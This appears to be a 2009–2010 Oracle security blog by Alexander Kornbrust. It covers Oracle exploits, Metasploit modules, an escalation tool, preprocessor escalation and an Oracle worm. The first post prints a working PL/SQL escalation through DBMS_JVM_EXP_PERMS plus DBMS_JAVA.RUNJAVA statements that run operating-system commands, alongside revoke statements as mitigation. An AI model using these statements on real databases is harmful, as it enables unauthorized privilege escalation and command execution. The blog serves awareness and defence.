4 Feb 2010 von Alexander Kornbrust.

I just read on Sumit Siddarth’s (Sid) blog that the video recording from David Litchfield’s BH presentation is online.

David showed how to escalate Java privileges using DBMS_JVM_EXP_PERMS.

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:

select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

For security reasons you should:

revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on “oracle/aurora/util/Wrapper” from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;

I just tested the code on my Linux 11.2.0.1 database and it worked without any problem.

SELECT * from dual where chr(42)=DBMS_JAVA.RUNJAVA(’oracle/aurora/util/Wrapper /bin/touch /tmp/iwashere3′);

Geschrieben in Exploit, David Litchfield | Drucken | 3 Kommentare »

17 Nov 2009 von Alexander Kornbrust.

Metasploit 3.3, the leading exploit framework is out. Here an extract from the Metasploit blog:

“Oracle exploit support has been implemented through a tag-team effort between MC and Chris Gates, with assistance from Alexander Kornbrust. Oracle modules have been developed for exploiting TNS protocol stack and Web-based Oracle services, as well as post-authentication database-level privilege escalation flaws. ”

Version 3.3. (release notes) is the largest known ruby application (375,000 lines of code) and comes with some new Oracle features

• Support for the Oracle InstantClient Ruby driver as an exploit mixin
• Extensive support for exploitation and post-exploitation tasks against Oracle databases

Have fun using Metasploit.

Geschrieben in Tools, Exploit, Oracle Security, Allgemein | Drucken | Keine Kommentare »

13 Nov 2009 von Alexander Kornbrust.

During my research on Russian websites I found a new security tool called “Oracle Security Tools“. This tool offers different methods to exploit Oracle databases.

Here is a list of features

• The privileges escalation of the Oracle users;
• The verification of system accounts concerning the existence of a default password;
• Account compliance test of login=password
• The execution of the PL/SQL code;
• The privileges escalation in the OS Windows 2000/XP/2003 (add a local user as root and holder of remote connection powers);
• The infiltration into the OS and the execution of DOS-commands, holding the administrative rights.
• Viewing the users’ connections to the database and their activity;
• Analyse the external TNS listener.log;

After checking the executable on virustotal I run the program on one of my test VMwares. After switching the russian interface to the english interface I not able to run the tool. I always got the error message:

It seems to be a problem with my vmware system and the mulitple Oracle Homes. After switching to another computer the program was working without problems.

Geschrieben in Tools, Exploit | Drucken | 1 Kommentar »

20 Okt 2009 von Alexander Kornbrust.

Paul Wright wrote an interesting whitepaper “Create table to OSDBA” about the new preprocessor feature in 11.1.0.7 and higher to run OS commands via tables. This whitepaper shows how to escalate privileges by running operating system commands using create table together with utl_file. In the future Oracle plans to backport the functionality to Oracle 10.2.0.5.

I already talked about the danger of running OS commands via “Create Table” in February 2009 “Trends 2009” (German slides, slide 20) and released in April 2009 a tutorial how to run OS commands via Create table, dbms_scheduler,extproc,plsql native 9, plsql native 10/11, Oracle text and alter systems.Paul added the idea executing files created with utl_file.

Oracle changed the preprocessor handling in Oracle 11.2.0.1.  In 11.2.0.1 it is necessary to have the EXECUTE privileges  on a directory objects (”Execute a preprocessor program that resides in the directory. A preprocessor program converts data to a supported format when loading data records from an external table with the ORACLE_LOADER access driver. Refer to Oracle Database Utilities for more information. This privilege does not implicitly allow READ access on the external table data.”).

Paul wrote a recommendation how to mitigate the preprocessor risk. He recommends to revoke utl_file from public. This is a good idea but keep in mind that there are multiple ways to create (text) files on OS level (e.g. Sample Exploit using dbms_advisor).

I would also recommend to grant read,write instead of granting ALL on directory objects (which includes EXECUTE in 11.2.0.1). And granting to PUBLIC is also always a bad idea. Grant privileges always to a role and/or user only.

Geschrieben in Exploit, Oracle Security | Drucken | 1 Kommentar »

5 Aug 2009 von Alexander Kornbrust.

Sumit Siddharth has published his Defcon presentation about “The Making of Second SQL Injection Worm (Oracle Edition)“.

Sumit describes the differences between SQL Injection and PL/SQL Injection and presents his tool “oap_hacker.pl” which allows to run OS commands via Java. oap_hacker.pl and Bsqlbf v.2.3 are using a PL/SQL Injection bug in dbms_export_extension (the old one and not the new one which was fixed with the CPU July 2009).

BTW, the (underground) tool darkORASQLi.py to dump data from Oracle databases is also using the dbms_export_extension vulnerability to run OS command.

A demo of his Oracle worm ora_w0rm.pl is available on YouTube.

Here are some screenshots how to overtake a client PC accessing an (via worm) infected Oracle System:

Very interesting work. Thanks Sumit for this presentation.

Geschrieben in Exploit, SQL Injection, Oracle Security | Drucken | 1 Kommentar »